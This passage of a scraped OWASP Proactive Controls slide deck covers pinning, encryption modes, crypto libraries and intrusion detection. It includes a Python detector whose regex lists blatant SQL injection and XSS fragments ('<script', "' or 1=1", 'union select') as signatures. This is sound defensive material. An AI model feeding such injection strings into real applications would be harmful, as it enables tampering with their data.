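        self._pins = {}  # host -> sha256 pin recorded on first use

    def check(self, host, spki_der):
        pin = spki_pin(spki_der)
        if host not in self._pins:
            self._pins[host] = pin  # first use: nothing to compare against yet
            return True
        return self._pins[host] == pin  # later use: a changed key is a mismatch
```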
![Page 67: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/67.jpg)
Pinning in Play (Chrome) https://www.owasp.org/index.php/Pinning_Cheat_Sheet
![Page 68: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/68.jpg)
Forward Secrecy
Perfect forward secrecy (PFS)
https://whispersystems.org/blog/asynchronous-security/
![Page 69: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/69.jpg)
![Page 70: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/70.jpg)
AES
![Page 71: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/71.jpg)
AES-ECB
![Page 72: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/72.jpg)
AES-GCM (Galois/Counter Mode)
![Page 73: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/73.jpg)
Galois/Counter Mode
![Page 74: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/74.jpg)
AES-CBC
![Page 75: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/75.jpg)
IV
![Page 76: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/76.jpg)
Padding
![Page 77: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/77.jpg)
![Page 78: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/78.jpg)
![Page 79: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/79.jpg)
HMAC
![Page 80: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/80.jpg)
![Page 81: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/81.jpg)
![Page 82: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/82.jpg)
![Page 83: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/83.jpg)
![Page 84: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/84.jpg)
Rest: Google KeyCzar https://github.com/google/keyczar

```java
import org.keyczar.Crypter;

// Keys are read from a key set on disk; encrypt/decrypt throw KeyczarException on failure
Crypter crypter = new Crypter("/path/to/your/keys");
String ciphertext = crypter.encrypt("Secret message");
String plaintext = crypter.decrypt(ciphertext);
```
Keyczar is an open source cryptographic toolkit for Java, Python and C++.
Designed to make it easier and safer for developers to use cryptography in their applications.
Secure key rotation and versioning
Safe default algorithms, modes, and key lengths
Automated generation of initialization vectors and ciphertext signatures
![Page 85: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/85.jpg)
Rest: Libsodium https://www.gitbook.com/book/jedisct1/libsodium/details
A high-security, cross-platform & easy-to-use crypto library.
Modern, easy-to-use software library for encryption, decryption, signatures, password hashing and more.
It is a portable, cross-compilable, installable & packageable fork of NaCl, with a compatible API, and an extended API to improve usability even further.
Provides all of the core operations needed to build higher-level cryptographic tools.
Sodium supports a variety of compilers and operating systems, including Windows (with MinGW or Visual Studio, x86 and x86_64), iOS and Android.
The design choices emphasize security, and "magic constants" have clear rationales.
![Page 86: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/86.jpg)
C8: Implement Logging and Intrusion Detection
![Page 87: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/87.jpg)
Logging framework: SLF4J with Logback or Apache Log4j2.
![Page 88: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/88.jpg)
checkboxes, radio buttons
Forced browsing to common attack entry points
Honeypot URL (e.g. a fake path listed in robots.txt, such as /admin/secretlogin.jsp)
![Page 89: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/89.jpg)
App Layer Intrusion Detection: Detection Point Examples
Blatant SQLi or XSS injection attacks.
Workflow sequence abuse (e.g. multi-part form in wrong order).
Custom business logic (e.g. basket vs catalogue price mismatch).
Further study:
AppSensor OWASP Project
libinjection: from SQLi to XSS – Nick Galbreath
Attack Driven Defense – Zane Lackey
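An added example, not from the slides or the OWASP AppSensor project: the detection points listed on this and the previous slide (honeypot URL, blatant injection, workflow order, basket vs catalogue price) evaluated over constructed request records, with a per-session counter so repeated signals can drive a response. The checkout flow, catalogue prices and the injection signatures are all constructed for the example.

```python
import re
from collections import defaultdict

HONEYPOT_PATHS = {"/admin/secretlogin.jsp"}  # the fake robots.txt path from the slide
CHECKOUT_ORDER = ["/cart", "/address", "/payment", "/confirm"]  # constructed multi-step flow
CATALOGUE_PRICES = {"sku-1001": 1999, "sku-1002": 4500}  # constructed, in cents
# Signatures for *blatant* attempts only; anything subtler needs a real parser (libinjection).
BLATANT_INJECTION = re.compile(r"(?i)(<script\b|'\s*or\s+1\s*=\s*1|union\s+select)")


class AppLayerDetector:
    def __init__(self, threshold=3):
        self.threshold = threshold
        self.counts = defaultdict(int)  # session -> number of detection-point hits
        self.last_step = {}             # session -> index of the furthest checkout step seen

    def inspect(self, req):
        """Return the detection points a request triggers and update the session counter.
        req is a dict: session, path, optional params (dict) and basket (sku -> price)."""
        hits = []
        sid, path = req["session"], req["path"]
        if path in HONEYPOT_PATHS:
            hits.append("honeypot-url")
        if any(BLATANT_INJECTION.search(v) for v in req.get("params", {}).values()):
            hits.append("blatant-injection")
        if path in CHECKOUT_ORDER:
            step = CHECKOUT_ORDER.index(path)
            # Jumping ahead of the next expected step is workflow sequence abuse
            if step > self.last_step.get(sid, -1) + 1:
                hits.append("workflow-out-of-order")
            self.last_step[sid] = max(step, self.last_step.get(sid, -1))
        basket = req.get("basket")
        if basket and any(CATALOGUE_PRICES.get(sku) != price for sku, price in basket.items()):
            hits.append("price-mismatch")  # client-supplied price differs from the catalogue
        self.counts[sid] += len(hits)
        return hits

    def should_respond(self, sid):
        """True once a session has accumulated enough hits to act on (e.g. lock it)."""
        return self.counts[sid] >= self.threshold
```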
![Page 90: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/90.jpg)
C9: Security Frameworks
![Page 91: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/91.jpg)
Security Frameworks
Don't reinvent the wheel: use existing coding libraries and software frameworks
Use native secure features of frameworks rather than importing third party libraries.
Stay up to date!
![Page 92: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/92.jpg)
A1 – Injection
A2 – Broken Authentication and Session Management
A3 – Cross-Site Scripting (XSS)
A4 – Insecure Direct Object References
A5 – Security Misconfiguration
A6 – Sensitive Data Exposure
A7 – Missing Function Level Access Control
A8 – Cross-Site Request Forgery
A9 – Using Components with Known Vulnerabilities
A10 – Unvalidated Redirects and Forwards
(but not consistently)
![Page 93: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/93.jpg)
C10: Error and Exception Handling
![Page 94: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/94.jpg)
![Page 95: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/95.jpg)
![Page 96: OWASP Top Ten Proactive Controls 2 - master.cmc.msu.rumaster.cmc.msu.ru/files/OWASP_Top_Ten_Proactive_Controls_v2_rus.pdf · OWASP Top Ten Proactive Controls v2 … What’s new ?](https://reader031.vdocuments.mx/reader031/viewer/2022021810/5c77b83709d3f21d538c2cea/html5/thumbnails/96.jpg)
OWASP Top Ten Proactive Controls 2.0